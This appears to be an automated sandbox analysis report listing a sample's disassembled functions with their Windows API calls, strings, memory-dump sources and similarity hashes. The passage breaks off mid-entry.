Function 00B19837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00B19862
__swprintf.LIBCMT ref: 00B198AC
__i64tow.LIBCMT ref: 00B4F5E6

Strings

True, xrefs: 00B4F5A7
%.15g, xrefs: 00B198A6
False, xrefs: 00B4F5AE
0x%p, xrefs: 00B4F5C8

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: f42874c915fa2ae5c899fbe592cb7bd41c9402ca7d87719dc6dd41f1e311100c
Instruction ID: 39da301ff51b4790c4df72ede6748519bea38355c07b2d2e58f6d5be83c736f0
Opcode Fuzzy Hash: f42874c915fa2ae5c899fbe592cb7bd41c9402ca7d87719dc6dd41f1e311100c
Instruction Fuzzy Hash: A941B371614206AEEB24EF74D892EBAB3E8FF45340F7044FEE549D7291EE319A419B10

Function 00B97152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9716A
CreateMenu.USER32 ref: 00B97185
SetMenu.USER32(?,00000000), ref: 00B97194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B97221
IsMenu.USER32(?), ref: 00B97237
CreatePopupMenu.USER32 ref: 00B97241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B9726E
DrawMenuBar.USER32 ref: 00B97276

Strings

0, xrefs: 00B97160
F, xrefs: 00B97262

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 5e6c69acaecce22bf34c040214ba5af9c4e35a7d8b757cc57a1c0ba66f9c4a80
Instruction ID: 3cb74ba2b8d6e654bb4b3e9bad383669ef525fbdfabc49d0a3658fcfa34353be
Opcode Fuzzy Hash: 5e6c69acaecce22bf34c040214ba5af9c4e35a7d8b757cc57a1c0ba66f9c4a80
Instruction Fuzzy Hash: 11414574A11209EFDF20DFA4D984EAABBF5FF09310F1400A9F905A7360DB31A910CB90

Function 00B68F8F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B6AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B69014
GetDlgCtrlID.USER32 ref: 00B6901F
GetParent.USER32 ref: 00B6903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B6903E
GetDlgCtrlID.USER32(?), ref: 00B69047
GetParent.USER32(?), ref: 00B69063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B69066

Strings

ComboBox, xrefs: 00B68F9C
@U=u, xrefs: 00B69066
ListBox, xrefs: 00B68FD1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: a6aafc156df759110ffccc47518b7201fe04a9084990f2535920789a75a75c63
Instruction ID: 1b0c1dce348319e224cf1f69b912781819cdbe11d5e0657202be8f5fa1417177
Opcode Fuzzy Hash: a6aafc156df759110ffccc47518b7201fe04a9084990f2535920789a75a75c63
Instruction Fuzzy Hash: 2721B874A00209BFDF15ABA0CC85EFEB7B9EF45320F1001A6B561972B1DF795855DA20

Function 00B6907A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

Part of subcall function 00B6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B6AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B690FD
GetDlgCtrlID.USER32 ref: 00B69108
GetParent.USER32 ref: 00B69124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B69127
GetDlgCtrlID.USER32(?), ref: 00B69130
GetParent.USER32(?), ref: 00B6914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00B6914F

Strings

ComboBox, xrefs: 00B69087
@U=u, xrefs: 00B6914F
ListBox, xrefs: 00B690BC

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: 227da20cb743950007ecb80ad322f99aba1e3a0bee64edd49a59bcf58bd62ab7
Instruction ID: 9f44138019e3651457b5d26b07343092d99a2fbd7e6518f69690485b94850d19
Opcode Fuzzy Hash: 227da20cb743950007ecb80ad322f99aba1e3a0bee64edd49a59bcf58bd62ab7
Instruction Fuzzy Hash: 7E21F5B4A40209BBDF10ABA0CC85EFEBBF8EF45310F5000A6B911A72A1DF794855DB20

Function 00B69163 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B6916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00B69184
_wcscmp.LIBCMT ref: 00B69196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B69211

Strings

smallicons, xrefs: 00B691D9
@U=u, xrefs: 00B69211
list, xrefs: 00B691F3
details, xrefs: 00B691BF
largeicons, xrefs: 00B691A5
SHELLDLL_DefView, xrefs: 00B69190

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-1428604138
Opcode ID: 2818b808e0afaa24b4fba83a9a38c40134ba09918466008b72f6c5de6fd560d2
Instruction ID: 2c752d2f9bee9121c75c021aaee56aa6c9f531abfb321a673dd8c1a68bc9d828
Opcode Fuzzy Hash: 2818b808e0afaa24b4fba83a9a38c40134ba09918466008b72f6c5de6fd560d2
Instruction Fuzzy Hash: 9C11C636288317BAFA112764DC1BEB737DCDB15730F3000EAFA10E54E1EEB568515994

Function 00B36E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B36E3E

Part of subcall function 00B38B28: __getptd_noexit.LIBCMT ref: 00B38B28

__gmtime64_s.LIBCMT ref: 00B36ED7
__gmtime64_s.LIBCMT ref: 00B36F0D
__gmtime64_s.LIBCMT ref: 00B36F2A
__allrem.LIBCMT ref: 00B36F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B36F9C
__allrem.LIBCMT ref: 00B36FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B36FD1
__allrem.LIBCMT ref: 00B36FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B37006
__invoke_watson.LIBCMT ref: 00B37077

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: ce754d9d3104fb41ebb02896a6bb15369f11e35e70c5a6bac6e02fc109c419d5
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 2871D8B6A40716BBD724AE68DC81B5AB3F4EF04724F2486B9F514D7281EB70DE448B90

Function 00B72527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72542
GetMenuItemInfoW.USER32(00BD5890,000000FF,00000000,00000030), ref: 00B725A3
SetMenuItemInfoW.USER32(00BD5890,00000004,00000000,00000030), ref: 00B725D9
Sleep.KERNEL32(000001F4), ref: 00B725EB
GetMenuItemCount.USER32(?), ref: 00B7262F
GetMenuItemID.USER32(?,00000000), ref: 00B7264B
GetMenuItemID.USER32(?,-00000001), ref: 00B72675
GetMenuItemID.USER32(?,?), ref: 00B726BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B72700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B72714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B72735

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6354c7a62782406e68283541c5f255db7072a6ecc9111e1e50edac57615171d4
Instruction ID: 1efd77a8e64d67362112971fe4619716ac84dfc08394391cc766c606c8530966
Opcode Fuzzy Hash: 6354c7a62782406e68283541c5f255db7072a6ecc9111e1e50edac57615171d4
Instruction Fuzzy Hash: AA618F7090024AAFDF25CF64DD88DBE7BF8EB45304F14819AE865A7251DB31ED05DB21

Function 00B96F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B96FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B96FA8
GetWindowLongW.USER32(?,000000F0), ref: 00B96FCC
_memset.LIBCMT ref: 00B96FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B96FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B97067

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: ef673c11930307a8314196b799147071223225be22e469fe1085a3517072f42e
Instruction ID: 9ee8e3890be2051277fa40943dd9de1d2a04aa9aebf3ad252ada0bdd002588f6
Opcode Fuzzy Hash: ef673c11930307a8314196b799147071223225be22e469fe1085a3517072f42e
Instruction Fuzzy Hash: 16615E75940218AFDB11DFA4CC81EEE77F8EB09710F1041AAFA14AB2A1DB71AD45DB90

Function 00B66B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B66BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00B66C18
VariantInit.OLEAUT32(?), ref: 00B66C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B66C4A
VariantCopy.OLEAUT32(?,?), ref: 00B66C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B66CB1
VariantClear.OLEAUT32(?), ref: 00B66CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00B66CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B66CDC
VariantClear.OLEAUT32(?), ref: 00B66CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B66CF9

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6816b24d6b0c450d0a48986edf9d30d9ff5e69e28af5f53837c9b7c3b91e7fbb
Instruction ID: c642ed681ccd5419b3f6c06c2f05bf5ac0afe6112b0e3c2eef23b0cb3653e3a6
Opcode Fuzzy Hash: 6816b24d6b0c450d0a48986edf9d30d9ff5e69e28af5f53837c9b7c3b91e7fbb
Instruction Fuzzy Hash: 11412075A002199FCF00DF69D9849EEBBF9EF48354F0080B9E955E7361DB34A945CB90

Function 00B9D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

GetSystemMetrics.USER32(0000000F), ref: 00B9D47C
GetSystemMetrics.USER32(0000000F), ref: 00B9D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B9D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B9D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B9D716
ShowWindow.USER32(00000003,00000000), ref: 00B9D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00B9D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B9D77D

Strings

@U=u, xrefs: 00B9D6F5, 00B9D716

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID: @U=u
API String ID: 1211466189-2594219639
Opcode ID: 891c06c5d75dab2501ea11d8eb8885f3d773372125fa5a69a9bbf29e1151f5dd
Instruction ID: cd1f1a863830bc2c94d318ab146bb3e3039eecab7e0308723dd89562252b7dc8
Opcode Fuzzy Hash: 891c06c5d75dab2501ea11d8eb8885f3d773372125fa5a69a9bbf29e1151f5dd
Instruction Fuzzy Hash: ECB14875600215ABDF14CF6AC9C57B97BF1FF04711F0981BAEC489B295DB34A950CBA0

Function 00B12E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B12EAE

Part of subcall function 00B11DB3: GetClientRect.USER32(?,?), ref: 00B11DDC
Part of subcall function 00B11DB3: GetWindowRect.USER32(?,?), ref: 00B11E1D
Part of subcall function 00B11DB3: ScreenToClient.USER32(?,?), ref: 00B11E45

GetDC.USER32 ref: 00B4CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B4CD45
SelectObject.GDI32(00000000,00000000), ref: 00B4CD53
SelectObject.GDI32(00000000,00000000), ref: 00B4CD68
ReleaseDC.USER32(?,00000000), ref: 00B4CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B4CDFB

Strings

U, xrefs: 00B4CCD0
@U=u, xrefs: 00B4CD45

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: 0a60651d2145292bfa27dc10ece8639568732fe30afe2e50917bed01a1943500
Instruction ID: b805376c09f1e2c9a41623ff5cceac092edd2994d540947f04f913716ac29caa
Opcode Fuzzy Hash: 0a60651d2145292bfa27dc10ece8639568732fe30afe2e50917bed01a1943500
Instruction Fuzzy Hash: DF71AE31901205DFCF618F64C880AFA7FF5FF48320F1442BAED559A2A6D7319991EBA0

Function 00B85732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B85793
inet_addr.WSOCK32(?,?,?), ref: 00B857D8
gethostbyname.WSOCK32(?), ref: 00B857E4
IcmpCreateFile.IPHLPAPI ref: 00B857F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B85862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B85878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B858ED
WSACleanup.WSOCK32 ref: 00B858F3

Strings

Ping, xrefs: 00B85816

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 7390c8eb27176ad0c0bb3f0c26dacd0088277e12e03f92bd78a3a0a6bc0e8e1f
Instruction ID: f22262fa6360cd8e400c951615d9730dfcb9e787210cb84fe9e7937d728a9ac8
Opcode Fuzzy Hash: 7390c8eb27176ad0c0bb3f0c26dacd0088277e12e03f92bd78a3a0a6bc0e8e1f
Instruction Fuzzy Hash: 69517E31604601DFDB20EF65DC85B6A77E4EF48720F1445AAF996DB2A1DB30ED40CB52

Function 00B7B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B7B546
GetLastError.KERNEL32 ref: 00B7B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00B7B5BD

Strings

INVALID, xrefs: 00B7B58F
READY, xrefs: 00B7B596
UNKNOWN, xrefs: 00B7B575
READONLY, xrefs: 00B7B588
NOTREADY, xrefs: 00B7B57C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 51f6ca49d6fdf2a724a57714e853dd47e0fae91846fec970ab584965477ca3e8
Instruction ID: 881bb6c2025a63440d6f66f41f15c9d14a9b283df9eedf2e2dbde5b0566b5f95
Opcode Fuzzy Hash: 51f6ca49d6fdf2a724a57714e853dd47e0fae91846fec970ab584965477ca3e8
Instruction Fuzzy Hash: AC318235A00205EFCB00DB68C895FBE7BF4FF54310F1081A6E519E7291DB719A41CB91

Function 00B961D3 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B961EB
GetDC.USER32(00000000), ref: 00B961F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B961FE
ReleaseDC.USER32(00000000,00000000), ref: 00B9620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B96246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B96257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B9902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00B96291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B962B1

Strings

@U=u, xrefs: 00B96257, 00B962B1

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: 24267d20622ebab636454dff848626df565c67e0378108916ec85c62bffe049f
Instruction ID: bd25c2bfe739d263182be290049695d0e3afd5abf0cea4987a813d477227a237
Opcode Fuzzy Hash: 24267d20622ebab636454dff848626df565c67e0378108916ec85c62bffe049f
Instruction Fuzzy Hash: 11316F721012147FEF114F60CD8AFFA3BA9EF49765F044066FE08DA191CA759C51CB60

Function 00B888AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B888D7
CoInitialize.OLE32(00000000), ref: 00B88904
CoUninitialize.OLE32 ref: 00B8890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00B88A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B88B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BA2C0C), ref: 00B88B6F
CoGetObject.OLE32(?,00000000,00BA2C0C,?), ref: 00B88B92
SetErrorMode.KERNEL32(00000000), ref: 00B88BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B88C25
VariantClear.OLEAUT32(?), ref: 00B88C35

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
